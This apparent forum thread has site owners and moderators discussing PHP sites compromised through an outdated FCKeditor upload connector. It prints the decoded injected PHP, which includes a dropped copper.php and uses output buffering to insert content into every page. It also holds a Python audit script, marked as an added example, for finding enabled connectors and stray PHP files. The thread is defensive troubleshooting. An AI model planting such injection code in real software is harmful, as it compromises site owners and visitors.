1
fosterm
Sites Hacked .. Need some help please
  • 2008/9/29 23:45

  • fosterm

  • Just popping in

  • Posts: 93

  • Since: 2005/8/7 2


Hi all

Recently one of my sites which is still running 2.2.5 was hacked. Each php file had encrypted code added at the top of the file.
Every php file on my account was infected. The encrypted code was decoded by my provider and is as follows
if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/*****/public_html/modules/content/admin/fckeditor/editor/filemanager/browser/default/images/icons/32/copper.php')){include_once('/home/*****/public_html/modules/content/admin/fckeditor/editor/filemanager/browser/default/images/icons/32/copper.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/<body/si',$c)){return preg_replace('/(<body[^>]*>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}}


My provider stated, "We checked the issue and we could see that the codes are added to use the default editor of XOOPS software that you are using."

Can anyone tell me what the added code does?

Just today another site which is running XOOPS 2.0.16 and OpenX was hacked. The hack added an encrypted code to the start of every php file in the following directories,
root, Cache, OpenX, CPG and Frameworks.

Can anyone direct me to a solution to stop this behavior? Is it true that the editor from even XOOPS 2.0.16 can be used to inject this kind of code into php files?

What procedures do I need to perform to troubleshoot and or prevent this issue?

Both sites are running on the same shared server. File permissions on the changed files were set to 755 and 644. Mainfile.php was not altered due to it being set to 444 I assume.

If I left out anything necessary to understand the situation please ask me to provide it.


Thanks for the help
Foz

2
Mamba
Re: Sites Hacked .. Need some help please
  • 2008/9/30 0:41

  • Mamba

  • Moderator

  • Posts: 11251

  • Since: 2004/4/23


If I remember correctly, older versions of fckeditor had a security risk.
I don't have a link right now, but you should update to a newer version, or update your whole system to XOOPS 2.3.

3
ghia
Re: Sites Hacked .. Need some help please
  • 2008/9/30 9:24

  • ghia

  • Community Support Member

  • Posts: 4953

  • Since: 2008/7/3 1


First, you should not publicize hacking scripts!

Quote:

fosterm wrote:
My provider stated, "We checked the issue and we could see that the codes are added to use the default editor of XOOPS software that you are using."
Did he have additional data to support this claim? Or is he just jumping to conclusions by seeing editor and default in the file path from the XOOPS part of your site in the decoded hack? BTW, is FCKeditor your default XOOPS editor?

The referred file copper.php is a file that doesn't belong in the directory and is no part of the editor.
It has been induced there as part of the initial attack. Finding out how it came there will teach you more about the attack vector. All that is recently going on may be part of exploiting the hack.
Quote:
Can anyone tell me what the added code does?
That would be difficult without knowing what the copper.php file contains.

Quote:
Can anyone decode the above code and tell me what purpose it serves?
It contains the same, but tailored to the other site.
if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/xxx/public_html/openx_backup1/lib/xmlrpc/java/ApacheLib2/org/openads/proxy/copper.php')){include_once('/home/xxx/public_html/openx_backup1/lib/xmlrpc/java/ApacheLib2/org/openads/proxy/copper.php');
...

As you see in the file path, a directory in your OpenX was used. You are also running other software, such as OpenX, on your site(s), which can mean that your site(s) may contain other vulnerabilities than in the XOOPS system alone, which is relatively secure (or can be made to be).

(I hope OpenX is not too open! (Sorry, couldn't resist!))
Quote:
Can anyone direct me to a solution to stop this behavior? Is it true that the editor from even XOOPS 2.0.16 can be used to inject this kind of code into php files?

Known attack vectors for XOOPS are the older Spaw editor and the contuedo module. To say more, you must make a list of all your installed XOOPS items (modules, frameworks, editors, ...) with their versions (see all xoops_version.php).
Quote:
What procedures do I need to perform to troubleshoot and or prevent this issue?
There are already a lot of threads with sound advice for the XOOPS part of your site. For the other parts, you should seek help on the support fora of the respective software, such as OpenX.
Quote:

Mamba wrote:
If I remember correctly, older versions of fckeditor had a security risk.
I don't believe that applies to his versions.

4
fosterm
Re: Sites Hacked .. Need some help please
  • 2008/9/30 20:05

  • fosterm

  • Just popping in

  • Posts: 93

  • Since: 2005/8/7 2


Hi Ghia_

Thank you for the detailed reply.


I did not ask my provider to provide support for his XOOPS editor entrance theory. Being a novice at this, it never crossed my mind, but you are right, that question should be asked.

Using one of the links you posted, I changed my default XOOPS editor to tinyMCE instead of the XOOPS default. I assume it was originally FCK since I have never messed with the editors.

Unfortunately I had already restored the compromised files by the time I read your post asking what the copper.php file does. If this happens again I will make sure to follow up on that lead.

I did a cursory look at the OpenX site and did not find anything related to this hack..will continue to look.

Modules I am running on the 2.0.16 version are as follows:

WFDownload 3.2
pages 1.16
ads 3
Smartsection 2.13
Smartfaq 1.08
Liaise 1.26
Content 0.5
XHLD 3.07
Google Maps 0.83
Wordpress 2.05
protector 3.04
cbb 3.08
Xoops Tag 0.92
Smartclone 1
Happy Search 0.53
Happy Linux 1.4
Frameworks 1.22


Thanks Foz

5
ghia
Re: Sites Hacked .. Need some help please
  • 2008/9/30 20:15

  • ghia

  • Community Support Member

  • Posts: 4953

  • Since: 2008/7/3 1


Apart from the obvious updates for XOOPS and Protector, there is at first view nothing wrong with your module list.

Are you aware of this?
Quote:

openX wrote:
# Allow PHP code in ads to be executed: While it is possible to allow execution of PHP code in ads it should be noted that this represents a security risk.

6
fosterm
Re: Sites Hacked .. Need some help please
  • 2008/9/30 22:49

  • fosterm

  • Just popping in

  • Posts: 93

  • Since: 2005/8/7 2


I do not have "Allow PHP code in ads to be executed" enabled in my OpenX installation.

I found someone else with the exact issue running different software that uses similar editors.

http://www.tinyportal.net/index.php?topic=26106.0;all

I am still a bit confused. If the exploit is in FCK and I make another editor my default editor (tinymce) will that prevent the exploit through FCK?

Also from the link above it looks like tinymce may have a problem also?

Thanks again for all the help.

Foz

7
ghia
Re: Sites Hacked .. Need some help please
  • 2008/10/1 0:38

  • ghia

  • Community Support Member

  • Posts: 4953

  • Since: 2008/7/3 1


Quote:
I am still a bit confused. If the exploit is in FCK and I make another editor my default editor (tinymce) will that prevent the exploit through FCK?

No, whether you use the editor or not makes no difference. As long as the files are on your system, you are vulnerable.

The exploit uses the connectors. I don't know what the exact purpose is, but it seems you could upload files with it.
In the file config.php used by the hackers, the following is stated:
// SECURITY: You must explicitelly enable this "connector". (Set it to "true").
$Config['Enabled'] = true ;

Unfortunately, in the editor distributed with XOOPS this was set to true as displayed above. I believe in the new 2.3.0 it is set to false.
I believe you might be safe if you upgrade FCKeditor to the latest version or set the setting to false.

As stated by tinyportal.net:
Quote:
As to the exploit, I think it's because either Tinyportal or SMF is running an outdated version of the FCKeditor which is version 2.3.2 Build 1082. The current version is Version 2.6.3 and has "Important security fixes have been applied to the File Manager, Uploader and Connectors. Upgrade is highly recommended.".

The version of FCKeditor incorporated in 2.3.0 has to be checked if it complies with the latest official version.

If you are in doubt, remove the complete FCKeditor (all files in all (sub)directories)!

Quote:
Also from the link above it looks like tinymce may have a problem also?
It might if it is an older version. I have asked the author to specify the affected version.
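
An audit sketch for the two checks raised in this thread, added here as an example and not written by any poster or by the XOOPS or FCKeditor projects: it lists FCKeditor connector config.php files whose last `$Config['Enabled']` assignment is true, and PHP files sitting in asset directories (as copper.php did). The `audit` and `build_sample_tree` names, the asset-directory list and the sample tree are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Uncommented  $Config['Enabled'] = true|false ;  assignments (the setting quoted above).
ASSIGN_RE = re.compile(
    r"""^\s*\$Config\[\s*['"]Enabled['"]\s*\]\s*=\s*(true|false)\s*;""",
    re.IGNORECASE | re.MULTILINE)
# Assumption: directories with these names should hold static assets only.
ASSET_DIRS = {"images", "icons", "img", "css"}

def audit(webroot):
    """Return (enabled_connectors, stray_php) as sorted lists of relative paths."""
    root = Path(webroot)
    enabled, stray = [], []
    for path in root.rglob("*.php"):
        rel = path.relative_to(root)
        parts = [p.lower() for p in rel.parts[:-1]]
        # Connector configs live below .../filemanager/; the last assignment wins.
        if path.name.lower() == "config.php" and "filemanager" in parts:
            values = ASSIGN_RE.findall(path.read_text(errors="replace"))
            if values and values[-1].lower() == "true":
                enabled.append(rel.as_posix())
        # A PHP file inside an asset directory does not belong there.
        if ASSET_DIRS.intersection(parts):
            stray.append(rel.as_posix())
    return sorted(enabled), sorted(stray)

def build_sample_tree(root):
    """Constructed sample tree mirroring the directory layout named in the thread."""
    fm = Path(root) / "modules/content/admin/fckeditor/editor/filemanager"
    files = {
        fm / "browser/default/connectors/php/config.php":
            "<?php\n// constructed sample\n$Config['Enabled'] = true ;\n",
        fm / "upload/php/config.php":
            "<?php\n// $Config['Enabled'] = true ;\n$Config['Enabled'] = false ;\n",
        fm / "browser/default/images/icons/32/copper.php":
            "<?php /* harmless placeholder standing in for the dropped file */\n",
        Path(root) / "index.php": "<?php\n",
    }
    for path, body in files.items():
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        print(audit(tmp))
```

Run `audit()` against the real document root of each site on the account; every path in the first list is a connector to disable or remove, and every path in the second needs a manual look.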

8
ernestfran
Re: Sites Hacked .. Need some help please
  • 2011/7/31 21:14

  • ernestfran

  • Just popping in

  • Posts: 2

  • Since: 2011/7/31


Hey, I was thinking the same as ghia, the least thing you wanna do is post what got hacked! Something similar had happened to me also with an old version from 2008 and I almost committed the same mistake as this.

As the guys mentioned the best thing to do is to look for updates and patch it ASAP!
